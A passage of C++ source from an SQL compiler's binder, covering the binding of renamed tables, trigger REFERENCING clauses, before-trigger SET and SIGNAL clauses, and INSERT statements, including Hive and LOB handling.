resultTable->addColumn(bindWA, colRefName, valId, SYSTEM_COLUMN); //above) } } setRETDesc(resultTable); // MVs -- // When binding INTERNAL REFRESH commands, the SYSKEY and @OP columns should // be propageted to the scope above, even when they are not specified in the // select list. if (bindWA->isPropagateOpAndSyskeyColumns()) getRETDesc()->propagateOpAndSyskeyColumns(bindWA, FALSE); bindWA->getCurrentScope()->setRETDesc(resultTable); // // Insert the table name into the XTNM, // casting away constness on the correlation name // in order to have default cat+sch filled in. // bindWA->getCurrentScope()->getXTNM()->insertNames(bindWA, (CorrName &)tableName); if (bindWA->errStatus()) { delete resultTable; return this; } if (getViewNATable()) { const NATable * natable = getViewNATable() ; const ColumnDescList &columnsRET = *(resultTable->getColumnList()); for (i = 0; i < natable->getColumnCount(); i++) { columnsRET[i]->setViewColPosition( ((natable->getNAColumnArray())[i])->getPosition()); columnsRET[i]->setViewFileName((const char*)natable->getViewFileName()); } } // // Bind the base class. 
  //
  return bindSelf(bindWA);
} // RenameTable::bindNode()

// -----------------------------------------------------------------------
// member functions for class RenameReference
// -----------------------------------------------------------------------

// This method replaces the RETDesc of the current scope, with a new RETDesc
// that contains the columns of the transition values (OLD@ and NEW@) but
// with correlation names specified by the user in the REFERENCING clause
// of the row trigger.
void RenameReference::prepareRETDescWithTableRefs(BindWA *bindWA)
{
  CollIndex refsToFind = getRefList().entries();
  CollIndex refsFound = 0;
  RETDesc *retDesc;

  // First find the NEW@ and OLD@ tables in one of the scopes.
  BindScope *scope = bindWA->getCurrentScope();
  // For each BindScope,
  while ((scope!=NULL) && (refsToFind > refsFound))
  { // until we find all the references.
    retDesc = scope->getRETDesc();

    // Skip if an empty RETDesc
    if ((retDesc!=NULL) && !retDesc->isEmpty())
    {
      // For each reference to change
      for (CollIndex i=0; i<refsToFind; i++)
        // Find the table name in the RETDesc, and save a pointer to its
        // column list in the TableRefName object.
        if(getRefList().at(i).lookupTableName(retDesc))
          refsFound++;
    }

    // Get the next BindScope to search.
    scope = bindWA->getPreviousScope(scope);
  } // while not done

  RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA);

  // Create an empty RETDesc for the current scope.
  bindWA->getCurrentScope()->setRETDesc(resultTable);

  // For each table reference, add to the RETDesc of the current scope the
  // columns of the referenced tables with the new referencing
  // names as correlation names.
  for (CollIndex i=0; i<refsToFind; i++)
    getRefList()[i].bindRefColumns(bindWA);
}

// The RenameReference node renames values flowing down through it.
// It is used above a row trigger body, to implement the REFERENCING clause
// of the trigger definition - renaming the OLD and NEW transition variables
// to user-specified names.
//
// This bind is top-down, so we first prepare the RETDesc, and then bind
// the children using this RETDesc.
RelExpr *RenameReference::bindNode(BindWA *bindWA)
{
  if (nodeIsBound())
  {
    bindWA->getCurrentScope()->setRETDesc(getRETDesc());
    return this;
  }

  // Save the current RETDesc.
  RETDesc *prevRETDesc = bindWA->getCurrentScope()->getRETDesc();

  // Replace the RETDesc of the current scope with one that contains the user
  // names (MY_NEW, MY_OLD) instead of the reference names (NEW@, OLD@).
  prepareRETDescWithTableRefs(bindWA);

  // Bind the child nodes, in a new BindScope.
  // If we don't open a new scope here, the bindChildren() method will
  // overwrite the RETDesc of the current scope with NULL.
  bindWA->initNewScope();

  bindChildren(bindWA);
  if (bindWA->errStatus()) return this;

  // Bind the base class.
  RelExpr *boundNode = bindSelf(bindWA);

  // Save this scope's outer references before removing the scope.
  const ValueIdSet myOuterRefs = bindWA->getCurrentScope()->getOuterRefs();

  setRETDesc(bindWA->getCurrentScope()->getRETDesc());
  bindWA->removeCurrentScope();
  bindWA->getCurrentScope()->setRETDesc(prevRETDesc);

  // Now merge the outer references into the previous scope.
bindWA->getCurrentScope()->mergeOuterRefs(myOuterRefs); return boundNode; } // RenameReference::bindNode() // ----------------------------------------------------------------------- // member functions for class BeforeTrigger // ----------------------------------------------------------------------- ////////////////////////////////////////////////////////////////////////////// // Find the name and position of a column SET to by this before Trigger. // The targetColName is an output parameter, saving the bindSetClause() // method the work of finding the column name. // The naTable parameter is NULL during DML. and is only used for DDL // semantic checks. ////////////////////////////////////////////////////////////////////////////// Lng32 BeforeTrigger::getTargetColumn(CollIndex i, // Index of Assign expr. ColRefName* targetColName, const NATable *naTable) { ItemExpr *currentAssign = setList_->at(i); CMPASSERT(currentAssign->getOperatorType() == ITM_ASSIGN); ItemExpr *targetColReference = currentAssign->child(0); CMPASSERT(targetColReference->getOperatorType() == ITM_REFERENCE); ColRefName& targetColRefName = ((ColReference *)targetColReference)->getColRefNameObj(); if (targetColName != NULL) // return the column name to the binder. *targetColName = targetColRefName; const NAString& colName = targetColRefName.getColName(); // If called during DML binding of the BeforeTrigger node, the // column position will not be used, because the check for duplicate // SET columns was done in DDL time. if (naTable == NULL) return 0; // We get here from DDL binding of the BeforeTrigger node, or from // the Inlining code. NAColumn *colObj = naTable->getNAColumnArray().getColumn(colName); // If colObj is NULL, it's a bad column name. if (colObj == NULL) return -1; return colObj->getPosition(); } ////////////////////////////////////////////////////////////////////////////// // This method is called only during DDL (CREATE TRIGGER) of a before trigger // with a SET clause. // Each of the columns updated by the SET clause goes through several // semantic checks, that cannot be done in the parser. ////////////////////////////////////////////////////////////////////////////// void BeforeTrigger::doSetSemanticChecks(BindWA *bindWA, RETDesc *origRETDesc) { UpdateColumns localCols = UpdateColumns(FALSE); ColRefName currentCol; const NATable *scanNaTable = NULL; NABoolean isUpdateOp=FALSE; Scan *scanNode = getLeftmostScanNode(); CMPASSERT(scanNode != NULL); scanNaTable = scanNode->getTableDesc()->getNATable(); CorrName oldCorr(OLDCorr); if (origRETDesc->getQualColumnList(oldCorr)) isUpdateOp = TRUE; for (CollIndex i=0; i<setList_->entries(); i++) { // Get the name and position of the Assign target column. Lng32 targetColPosition = getTargetColumn(i, &currentCol, scanNaTable); if (!currentCol.getCorrNameObj().isATriggerTransitionName(bindWA, TRUE)) { // 11017 Left hand of SET assignment must be qualified with the name of the NEW transition variable *CmpCommon::diags() << DgSqlCode(-11017) ; // must be NEW name bindWA->setErrStatus(); return; } if (targetColPosition == -1) { // 11022 Column $0~ColumnName is not a column in table $0~TableName NAString tableName = scanNaTable->getTableName().getQualifiedNameAsString(); *CmpCommon::diags() << DgSqlCode(-11022) << DgColumnName(currentCol.getColName()) << DgTableName(tableName); bindWA->setErrStatus(); return; } // We need to check for duplicate SET columns in DDL time only. 
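    // Illustrative example (hypothetical trigger): a clause such as
    //   SET MY_NEW.a = 1, MY_NEW.a = 2
    // names the same target column twice and is rejected here with error 4022.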
if (localCols.contains(targetColPosition)) { // 4022 column specified more than once *CmpCommon::diags() << DgSqlCode(-4022) << DgColumnName(currentCol.getColName()); bindWA->setErrStatus(); return; } localCols.addColumn(targetColPosition); // Is this a SET into a column that is part of the clustering key? // This is only allowed on Inserts, not on Updates (Deletes never get here). if (isUpdateOp && scanNaTable->getNAColumnArray().getColumn(targetColPosition)->isClusteringKey()) { // 4033 Column $0~ColumnName is a primary or clustering key column and cannot be updated. *CmpCommon::diags() << DgSqlCode(-4033) << DgColumnName(currentCol.getColName()); bindWA->setErrStatus(); return; } } } ////////////////////////////////////////////////////////////////////////////// // This method is called for before triggers that use the SET clause. // For each column to be set using SET MYNEW.<colname> = <setExpr> do: // 1. Find NEW@.<colname> in origRETDesc. // 2. Verify that there is such a column, and that the user is allowd to // change it. // 3. Get the column's ItemExpr expression, and save it in passThruExpr. // 4. Create an ItemExpr tree as follows: // case // | // IfThenElse // / | \ // condition setExpr passThruExpr // // where condition is the WHEN clause expression. // 5. Bind this new expression in the RETDesc of the current scope. // 6. remove NEW@.<colname> from origRETDesc, and re-insert it as the new // expression. ////////////////////////////////////////////////////////////////////////////// void BeforeTrigger::bindSetClause(BindWA *bindWA, RETDesc *origRETDesc, CollHeap *heap) { // Semantic checks are only needed during DDL. if (bindWA->inDDL()) { doSetSemanticChecks(bindWA, origRETDesc); if (bindWA->errStatus()) return; } CorrName newCorr(NEWCorr); const TableRefName *newRefName = getRefList().findTable(newCorr); CMPASSERT(newRefName!=NULL); CorrName newRef = newRefName->getTableCorr(); ColRefName currentCol; // For each Assign expression in the list. for (CollIndex i=0; i<setList_->entries(); i++) { // Get the name and position of the Assign target column. Lng32 targetColPosition = getTargetColumn(i, &currentCol, NULL); currentCol.getCorrNameObj() = newRef; ItemExpr *setExpr = setList_->at(i)->child(1); // Find the current value of this NEW@ column. ColumnNameMap *currentColExpr = origRETDesc->findColumn(currentCol); CMPASSERT(currentColExpr != NULL); // Otherwise we would have been thrown with error 11022 - see above. ItemExpr *passThruExpr = currentColExpr->getValueId().getItemExpr(); ItemExpr *colExpr = NULL; if (whenClause_ == NULL) // After we add the support for reading the trigger status from // the resource fork, and adding it to the condition, we should // never get here. colExpr = setExpr; else { IfThenElse *ifExpr = new(heap) IfThenElse(whenClause_, setExpr, passThruExpr); colExpr = new(heap) Case(NULL, ifExpr); } colExpr = colExpr->bindNode(bindWA); if (bindWA->errStatus()) return; // Now remove and re-insert the column to the original RETDesc, // that will be restored at the bottom of the method. 
currentCol.getCorrNameObj() = newCorr; origRETDesc->delColumn(bindWA, currentCol, USER_COLUMN); origRETDesc->addColumn(bindWA, currentCol, colExpr->getValueId()); // force binding of the assign here so that type incompatability is caught // during DDL if (bindWA->inDDL()) { ItemExpr *currentAssign = setList_->at(i); CMPASSERT(currentAssign->getOperatorType() == ITM_ASSIGN); currentAssign->bindNode(bindWA); } } } ////////////////////////////////////////////////////////////////////////////// // This method is called for before triggers that use the SIGNAL clause. // 1. Find the "virtual execId column" in origRETDesc. // 3. Get the column's ItemExpr expression, and save it in passThruExpr. // 4. Create an ItemExpr tree as follows: // case // | // IfThenElse // / | \ // AND passThruExpr passThruExpr // / \ // condition RaiseError // // where condition is the WHEN clause expression, and RaiseError is the // SIGNAL expression. // 5. Bind this new expression in the RETDesc of the current scope. // 6. remove "virtual execId column" from origRETDesc, and re-insert it as // the new expression. // // The value of the expression is always the passThruExpr, for type // compatibility. since if the SIGNAL fires, the actual value returned does // not matter. The AND will evaluate the RaiseError only if the condition // evaluates to TRUE. ////////////////////////////////////////////////////////////////////////////// void BeforeTrigger::bindSignalClause(BindWA *bindWA, RETDesc *origRETDesc, CollHeap *heap) { if (bindWA->inDDL()) { // In DDL time (CREATE TRIGGER) all we need is to bind the signal // expression for semantic checks. signal_->bindNode(bindWA); if (bindWA->errStatus()) return; } else { // The SIGNAL expression is piggy-backed on the Unique ExecuteID // value inserted into the temp table. ColumnNameMap *execIdCol = origRETDesc->findColumn(InliningInfo::getExecIdVirtualColName()); CMPASSERT(execIdCol != NULL); const ColRefName& ExecIdColName = execIdCol->getColRefNameObj(); ItemExpr *passThruExpr = execIdCol->getValueId().getItemExpr(); ItemExpr *whenAndSignal = NULL; // Case 10-040604-5021: // General AND logic uses "short circuiting" as follows: if the // left side is FALSE, evaluation of the right side is skipped, and // the result returned is FALSE. The following expression depends on // evaluation of the right side being skipped whenever the left side // is NOT TRUE, (i.e., FALSE or NULL). Therefore, an IS TRUE unary // predicate must be placed above the actual WHEN condition. Otherwise, // the signal will fire when the WHEN condition evaluates to NULL. if (whenClause_ != NULL) { if (whenClause_->getOperatorType() == ITM_AND || whenClause_->getOperatorType() == ITM_OR) { ItemExpr *isTrueExpr = new (heap) UnLogic(ITM_IS_TRUE, whenClause_); whenAndSignal = new(heap) BiLogic(ITM_AND, isTrueExpr, signal_); } else { whenAndSignal = new(heap) BiLogic(ITM_AND, whenClause_, signal_); } } else // After we add the support for reading the trigger status from // the resource fork, and adding it to the condition, we should // never get here. whenAndSignal = signal_; // For type compatibity, the original value is used whatever the // WHEN clause evaluates to. However, if it evaluates to TRUE, the // evaluation of the signal expression will throw an SQLERROR. 
ItemExpr *condSignalExpr = new(heap) Case(NULL, new(heap) IfThenElse(whenAndSignal, passThruExpr, passThruExpr)); condSignalExpr = condSignalExpr->bindNode(bindWA); if (bindWA->errStatus()) return; // Now delete the original "virtual column" from the RETDesc, and // re-insert it with the new value. origRETDesc->delColumn(bindWA, ExecIdColName, USER_COLUMN); origRETDesc->addColumn(bindWA, ExecIdColName, condSignalExpr->getValueId()); } } ////////////////////////////////////////////////////////////////////////////// // This bind is bottom-up, so we first bind the children, and then use // and change the RETDesc they created. ////////////////////////////////////////////////////////////////////////////// RelExpr *BeforeTrigger::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindChildren(bindWA); if (bindWA->errStatus()) return this; // Now we know that we have the columns of OLD@ and NEW@ in the RETDesc // of the current scope. Save this scope so we can update it and restore // it when we are done. RETDesc *origRETDesc = bindWA->getCurrentScope()->getRETDesc(); CollHeap *heap = bindWA->wHeap(); CollIndex refsToFind = getRefList().entries(); // For each reference to change, Find the table name in the RETDesc, // and save a pointer to it's column list in the TableRefName object. CollIndex i=0; for (i=0; i<refsToFind; i++) getRefList().at(i).lookupTableName(origRETDesc); // Create an empty RETDesc for the current scope. // It will contain the names the user specified (MY_NEW, MY_OLD) for the // OLD@ and NEW@ transition variables, and will be used to bind this // node only. bindWA->getCurrentScope()->setRETDesc(new(heap) RETDesc(bindWA)); // For each table reference, add to the RETDesc of the current scope, // the columns of the referenced tables with the new referencing names // as correlation names. for (i=0; i<refsToFind; i++) getRefList().at(i).bindRefColumns(bindWA); // First bind the condition. The ValueId will be used later (possibly // multiple times) so that during execution, the expression will be // evaluated only once. if (whenClause_ != NULL) { whenClause_ = whenClause_->bindNode(bindWA); if (bindWA->errStatus()) return this; } // Use the bound condition to prepare the conditional expression // for each column modified by the trigger (SET MY_NEW.a = ...) if (setList_ != NULL) bindSetClause(bindWA, origRETDesc, heap); // Use the bound condition to prepare the conditional SIGNAL // expression, on the ExecuteId "virtual column". if (signal_ != NULL) bindSignalClause(bindWA, origRETDesc, heap); if (bindWA->errStatus()) return this; // We don't need the RETDesc of the current scope anymore. Restore the // original RETDesc with the updated columns. bindWA->getCurrentScope()->setRETDesc(origRETDesc); if (parentTSJ_ != NULL) { // If this is the top most before trigger, save a copy of the RETDesc // for use by the transformNode() pass. RETDesc *savedRETDesc = new(heap) RETDesc(bindWA, *origRETDesc); setRETDesc(savedRETDesc); } // // Bind the base class. 
// RelExpr *boundNode = bindSelf(bindWA); return boundNode; } // BeforeTrigger::bindNode() // ----------------------------------------------------------------------- // member functions for class Insert // ----------------------------------------------------------------------- // LCOV_EXCL_START - cnu static void bindInsertRRKey(BindWA *bindWA, Insert *insert, ValueIdList &sysColList, CollIndex i) { // For a KS round-robin partitioned table, the system column // (for now there is only one, SYSKEY) is initialized via the expression // "ProgDistribKey(partNum, rowPos, totalNumParts)". // const NAFileSet *fs = insert->getTableDesc()->getClusteringIndex()->getNAFileSet(); // For now, round-robin partitioned tables are always stored in // key-sequenced files, and there is only one system column (SYSKEY) // which is at the beginning of the record. CMPASSERT(fs->isKeySequenced() && i==0); CollHeap *heap = bindWA->wHeap(); // Host variables that provide access to partition number, // row position, and total number of partitions -- // supplied at run-time by the executor insert node. // ItemExpr *partNum = new (heap) HostVar("_sys_hostVarInsertPartNum", new (heap) SQLInt(FALSE,FALSE), // int unsigned not null TRUE // is system-generated ); partNum->synthTypeAndValueId(); insert->partNumInput() = partNum->getValueId(); // for later use in codeGen ItemExpr *rowPos = new (heap) HostVar("_sys_hostVarInsertRowPos", new (heap) SQLInt(FALSE,FALSE), // int unsigned not null TRUE // is system-generated ); rowPos->synthTypeAndValueId(); insert->rowPosInput() = rowPos->getValueId(); // for later use in codeGen ItemExpr *totNumParts = new (heap) HostVar("_sys_hostVarInsertTotNumParts", new (heap) SQLInt(FALSE,FALSE), // int unsigned not null TRUE // is system-generated ); totNumParts->synthTypeAndValueId(); insert->totalNumPartsInput() = totNumParts->getValueId(); // for later use // Generate expression to compute a round-robin key. Parameters to // ProgDistribKey are the partition number, the row position (which // is chosen randomly; the insert node will retry if a number is // selected that is already in use), and the total number of // partitions. ItemExpr *rrKey = new (heap) ProgDistribKey(partNum, rowPos, totNumParts); // Build and set round-robin key expression. Assign *assign = new (heap) Assign(sysColList[i].getItemExpr(), rrKey, FALSE /*not user-specified*/); assign->bindNode(bindWA); insert->rrKeyExpr() = assign->getValueId(); } // bindInsertRRKey // LCOV_EXCL_STOP RelExpr *Insert::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Set local binding flags setInUpdateOrInsert(bindWA, this, REL_INSERT); // The 8108 (unique constraint on an ID column) error must be raised // only for system generated IDENTITY values and not for // user generated ID values. We use the GenericUpdate::identityColumnUniqueIndex_ // to indicate to the EID that 8108 should be raised in place of 8102. // This variable is used to indicate that there is an IDENTITY column // in the table for which the system is generating the value // This is NULL if "DEFAULT VALUES" was specified, // non-NULL if a query-expr child was specified: VALUES.., TABLE.., SELECT.. 
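  // Illustrative examples:
  //   INSERT INTO t DEFAULT VALUES;    -- no query-expr child; child(0) is NULL
  //   INSERT INTO t VALUES (1, 'a');   -- query-expr child (a Tuple) is present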
RelExpr *someNonDefaultValuesSpecified = child(0); // Set flag for firstN in context if (child(0) && child(0)->getOperatorType() == REL_ROOT) // Indicating subquery if (child(0)->castToRelExpr() && child(0)->castToRelExpr()->getFirstNRows() >= 0) if (bindWA && bindWA->getCurrentScope() && bindWA->getCurrentScope()->context()) bindWA->getCurrentScope()->context()->firstN() = TRUE; if (NOT someNonDefaultValuesSpecified) { // "DEFAULT VALUES" specified // Kludge up a dummy child before binding the GenericUpdate tree setChild(0, new(bindWA->wHeap()) Tuple(new(bindWA->wHeap()) SystemLiteral(0))); } // Bind the GenericUpdate tree. // RETDesc *incomingRETDescForSource = bindWA->getCurrentScope()->getRETDesc(); RelExpr *boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; const NAFileSet* fileset = getTableDesc()->getNATable()->getClusteringIndex(); const NAColumnArray& partKeyCols = fileset->getPartitioningKeyColumns(); if (getTableDesc()->getNATable()->isHiveTable()) { if (partKeyCols.entries() > 0) { // Insert into partitioned tables would require computing the target // partition directory name, something we don't support yet. *CmpCommon::diags() << DgSqlCode(-4222) << DgString0("Insert into partitioned Hive tables"); bindWA->setErrStatus(); return this; } RelExpr * mychild = child(0); const HHDFSTableStats* hTabStats = getTableDesc()->getNATable()->getClusteringIndex()->getHHDFSTableStats(); const char * hiveTablePath; NAString hostName; Int32 hdfsPort; NAString tableDir; NABoolean result; char fldSep[2]; char recSep[2]; memset(fldSep,'\0',2); memset(recSep,'\0',2); fldSep[0] = hTabStats->getFieldTerminator(); recSep[0] = hTabStats->getRecordTerminator(); // don't rely on timeouts to invalidate the HDFS stats for the target table, // make sure that we invalidate them right after compiling this statement, // at least for this process ((NATable*)(getTableDesc()->getNATable()))->setClearHDFSStatsAfterStmt(TRUE); // inserting into tables with multiple partitions is not yet supported CMPASSERT(hTabStats->entries() == 1); hiveTablePath = (*hTabStats)[0]->getDirName(); result = ((HHDFSTableStats* )hTabStats)->splitLocation (hiveTablePath, hostName, hdfsPort, tableDir) ; if (!result) { *CmpCommon::diags() << DgSqlCode(-4224) << DgString0(hiveTablePath); bindWA->setErrStatus(); return this; } // NABoolean isSequenceFile = (*hTabStats)[0]->isSequenceFile(); const NABoolean isSequenceFile = hTabStats->isSequenceFile(); RelExpr * unloadRelExpr = new (bindWA->wHeap()) FastExtract( mychild, new (bindWA->wHeap()) NAString(hiveTablePath), new (bindWA->wHeap()) NAString(hostName), hdfsPort, TRUE, new (bindWA->wHeap()) NAString(getTableName().getQualifiedNameObj().getObjectName()), FastExtract::FILE, bindWA->wHeap()); RelExpr * boundUnloadRelExpr = unloadRelExpr->bindNode(bindWA); if (bindWA->errStatus()) return NULL; ((FastExtract*)boundUnloadRelExpr)->setRecordSeparator(recSep); ((FastExtract*)boundUnloadRelExpr)->setDelimiter(fldSep); ((FastExtract*)boundUnloadRelExpr)->setOverwriteHiveTable(getOverwriteHiveTable()); ((FastExtract*)boundUnloadRelExpr)->setSequenceFile(isSequenceFile); if (getOverwriteHiveTable()) { RelExpr * newRelExpr = new (bindWA->wHeap()) ExeUtilFastDelete(getTableName(), NULL, (char*)"hive_truncate", CharInfo::ISO88591, FALSE, TRUE, TRUE, TRUE, bindWA->wHeap(), TRUE, new (bindWA->wHeap()) NAString(tableDir), new (bindWA->wHeap()) NAString(hostName), hdfsPort); //new root to prevent error 4056 when binding newRelExpr = new (bindWA->wHeap()) 
RelRoot(newRelExpr); RelExpr *blockedUnion = new (bindWA->wHeap()) Union(newRelExpr, boundUnloadRelExpr); ((Union*)blockedUnion)->setBlockedUnion(); ((Union*)blockedUnion)->setSerialUnion(); RelExpr *boundBlockedUnion = blockedUnion->bindNode(bindWA); if (bindWA->errStatus()) return NULL; return boundBlockedUnion; } return boundUnloadRelExpr; } if(!(getOperatorType() == REL_UNARY_INSERT && (child(0)->getOperatorType() == REL_TUPLE || // VALUES (1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST || // VALUES (1,'b'),(2,'Y') child(0)->getOperatorType() == REL_UNION)) && // VALUES with subquery (getOperatorType() != REL_LEAF_INSERT)) { setInsertSelectQuery(TRUE); } // if table has a lob column, then fix up any reference to LOBinsert // function in the source values list. // if ((getOperatorType() == REL_UNARY_INSERT) && (getTableDesc()->getNATable()->hasLobColumn()) && (child(0)->getOperatorType() == REL_TUPLE || // VALUES (1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST)) // VALUES (1,'b'),(2,'Y') { if (child(0)->getOperatorType() == REL_TUPLE_LIST) { TupleList * tl = (TupleList*)(child(0)->castToRelExpr()); for (CollIndex x = 0; x < (UInt32)tl->numTuples(); x++) { ValueIdList tup; if (!tl->getTuple(bindWA, tup, x)) { bindWA->setErrStatus(); return boundExpr; // something went wrong } for (CollIndex n = 0; n < tup.entries(); n++) { ItemExpr * ie = tup[n].getItemExpr(); if (ie->getOperatorType() == ITM_LOBINSERT) { // cannot have this function in a values list with multiple // tuples. Use a single tuple. *CmpCommon::diags() << DgSqlCode(-4483); bindWA->setErrStatus(); return boundExpr; LOBinsert * li = (LOBinsert*)ie; li->insertedTableObjectUID() = getTableDesc()->getNATable()->objectUid().castToInt64(); li->lobNum() = n; li->insertedTableSchemaName() = getTableDesc()->getNATable()-> getTableName().getSchemaName(); } } // for } // for } // if tuplelist } // if // Prepare for any IDENTITY column checking later on NAString identityColumnName; NABoolean identityColumnGeneratedAlways = FALSE; identityColumnGeneratedAlways = getTableDesc()->isIdentityColumnGeneratedAlways(&identityColumnName); if ((getTableName().isVolatile()) && (CmpCommon::context()->sqlSession()->volatileSchemaInUse()) && (getTableName().getSpecialType() == ExtendedQualName::NORMAL_TABLE) && ((ActiveSchemaDB()->getDefaults()).getAsLong(IMPLICIT_UPD_STATS_THRESHOLD) > -1) && (bindWA->isInsertSelectStatement()) && (NOT getTableDesc()->getNATable()->isVolatileTableMaterialized())) { if (NOT Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL)) // if (NOT Get_SqlParser_Flags(NO_IMPLICIT_VOLATILE_TABLE_UPD_STATS)) { // treat this insert as a volatile load stmt. RelExpr * loadVolTab = new (bindWA->wHeap()) ExeUtilLoadVolatileTable(getTableName(), this, bindWA->wHeap()); boundExpr = loadVolTab->bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; return boundExpr; } else { NATable * nat = (NATable*)(getTableDesc()->getNATable()); nat->setIsVolatileTableMaterialized(TRUE); } } // Now we have to create the following three collections: // // - newRecExpr() // An unordered set of Assign nodes of the form // "col1 = value1, col2 = value2, ..." which is used by Norm/Optimizer. // // - newRecExprArray() // An ordered array of Assign nodes of the same form, // ordered by column position, which is used by Generator. // This array must have the following properties: // // - All columns not specified in the insert statement must be // Assign'ed with their default values. 
// // - If this is a key-sequenced table with a (non-RR) SYSKEY column, // we must create the first entry in the newRecExprArray // to be "SYSKEY_COL = 0". This is a placeholder where the timestamp // value will be moved at runtime. Round-robin SYSKEY columns are // initialized via an expression of the form "SYSKEY_COL = // ProgDistribKey(..params..)". SYSKEY columns for other table // organizations are handled by the file system or disk process. // // - updateToSelectMap() // A ValueIdMap that can be used to rewrite value ids of the // target table in terms of the source table and vice versa. // The top value ids are target value ids, the bottom value ids // are those of the source. // NABoolean view = bindWA->getNATable(getTableName())->getViewText() != NULL; ValueIdList tgtColList, userColList, sysColList, *userColListPtr; CollIndexList colnoList; CollIndex totalColCount, defaultColCount, i; getTableDesc()->getSystemColumnList(sysColList); // // Detach the column list and bind the columns to the target table. // Set up "colnoList" to map explicitly specified columns to where // in the ordered array we will be inserting later. // ItemExpr *columnTree = removeInsertColTree(); CMPASSERT(NOT columnTree || someNonDefaultValuesSpecified); if (columnTree || (view && someNonDefaultValuesSpecified)) { // // INSERT INTO t(colx,coly,...) query-expr; // INSERT INTO v(cola,colb,...) query-expr; // INSERT INTO v query-expr; // where query-expr is VALUES..., TABLE..., or SELECT..., // but not DEFAULT VALUES. // userColList is the full list of columns in the target table // colnoList contains, for those columns specified in tgtColList, // their ordinal position in the target table user column list // (i.e., not counting system columns, which can't be specified // in the insert column list); e.g. '(Z,X,Y)' -> [3,1,2] // CMPASSERT(NOT columnTree || columnTree->getOperatorType() == ITM_REFERENCE || columnTree->getOperatorType() == ITM_ITEM_LIST); getTableDesc()->getUserColumnList(userColList); userColListPtr = &userColList; RETDesc *columnLkp; if (columnTree) { // bindRowValues will bind using the currently scoped RETDesc left in // by GenericUpdate::bindNode, which will be that of the naTableTop // (topmost view or table), *not* that of the base table (getTableDesc()). 
columnLkp = bindRowValues(bindWA, columnTree, tgtColList, this, FALSE); if (bindWA->errStatus()) return boundExpr; } else { columnLkp = bindWA->getCurrentScope()->getRETDesc(); columnLkp->getColumnList()->getValueIdList(tgtColList); } if (GU_DEBUG) { // LCOV_EXCL_START - dpm cerr << "columnLkp " << flush; columnLkp->display(); // LCOV_EXCL_STOP } for (i = 0; i < columnLkp->getDegree(); i++) { // Describes column in the base table: ValueId source = columnLkp->getValueId(i); const NAColumn *nacol = source.getNAColumn(); // Gets name of the column in this (possibly view) table: const ColRefName colName = columnLkp->getColRefNameObj(i); // solution 10-081114-7315 if (bindWA->inDDL() && bindWA->isInTrigger ()) { if (!userColListPtr->contains(source)) { // 4001 column not found *CmpCommon::diags() << DgSqlCode(-4001) << DgColumnName(colName.getColName()) << DgString0(getTableName().getQualifiedNameObj().getQualifiedNameAsAnsiString()) << DgString1(bindWA->getDefaultSchema().getSchemaNameAsAnsiString()); bindWA->setErrStatus(); delete columnLkp; return boundExpr; } } if (columnLkp->findColumn(colName)->isDuplicate()) { // 4022 column specified more than once *CmpCommon::diags() << DgSqlCode(-4022) << DgColumnName(colName.getColName()); bindWA->setErrStatus(); delete columnLkp; return boundExpr; } colnoList.insert(nacol->getPosition()); // Commented out this assert, as Assign::bindNode below emits nicer errmsg // CMPASSERT((long)nacol->getPosition() - (long)firstColNumOnDisk >= 0); } if (columnTree) { delete columnLkp; columnLkp = NULL; } bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } else { // // INSERT INTO t query-expr; // INSERT INTO t DEFAULT VALUES; // INSERT INTO v DEFAULT VALUES; // userColListPtr points to tgtColList (which is the full list) // userColList not used (because tgtColList already is the full list) // colnoList remains empty (because tgtColList is already in order) // if no system columns, set to list of user cols otherwise getTableDesc()->getUserColumnList(tgtColList); userColListPtr = &tgtColList; if (sysColList.entries()) { // set up colnoList to indicate the user columns, to help // binding DEFAULT clauses in DefaultSpecification::bindNode() for (CollIndex uc=0; uc<tgtColList.entries(); uc++) { colnoList.insert(tgtColList[uc].getNAColumn()->getPosition()); } } } // Compute total number of columns. Note that there may be some unused // entries in newRecExprArray(), in the following cases: // - An SQL/MP entry sequenced table, entry 0 will not be used as // the syskey (col 0) is not stored in that type of table // - For computed columns that are not stored on disk totalColCount = userColListPtr->entries() + sysColList.entries(); newRecExprArray().resize(totalColCount); // Make sure children are bound -- GenericUpdate::bindNode defers // their binding to now if this is an INSERT..VALUES(..), // because only now do we have target column position info for // correct binding of INSERT..VALUES(..,DEFAULT,..) // in DefaultSpecification::bindNode. // // Save current RETDesc and XTNM. // Bind the source in terms of the original RETDesc, // with target column position info available through // bindWA->getCurrentScope()->context()->updateOrInsertNode() // (see DefaultSpecification::bindNode, calls Insert::getColDefaultValue). // Restore RETDesc and XTNM. 
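  // (Illustrative example: for INSERT INTO t(b, a) VALUES (DEFAULT, 1), binding
  //  the DEFAULT requires knowing that it maps to target column B; that mapping
  //  comes from the target column position info saved here.)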
// RETDesc *currRETDesc = bindWA->getCurrentScope()->getRETDesc(); bindWA->getCurrentScope()->setRETDesc(incomingRETDescForSource); bindWA->getCurrentScope()->xtnmStack()->createXTNM(); setTargetUserColPosList(colnoList); // if my child is a TupleList, then all tuples are to be converted/cast // to the corresponding target type of the tgtColList. // Pass on the tgtColList to TupleList so it can generate the Cast nodes // with the target types during the TupleList::bindNode. TupleList *tl = NULL; if (child(0)->getOperatorType() == REL_TUPLE_LIST) { tl = (TupleList *)child(0)->castToRelExpr(); tl->castToList() = tgtColList; } if (getTolerateNonFatalError() != RelExpr::UNSPECIFIED_) { HostArraysWA * arrayWA = bindWA->getHostArraysArea() ; if (arrayWA && arrayWA->hasHostArraysInTuple()) { if (getTolerateNonFatalError() == RelExpr::NOT_ATOMIC_) arrayWA->setTolerateNonFatalError(TRUE); else arrayWA->setTolerateNonFatalError(FALSE); // Insert::tolerateNonfatalError == ATOMIC_ } else if (NOT arrayWA->getRowwiseRowset()) { // NOT ATOMIC only for rowset inserts *CmpCommon::diags() << DgSqlCode(-30025) ; bindWA->setErrStatus(); return boundExpr; } } bindChildren(bindWA); if (bindWA->errStatus()) return this; // if this is an insert into native hbase table in _ROW_ format, then // validate that only REL_TUPLE 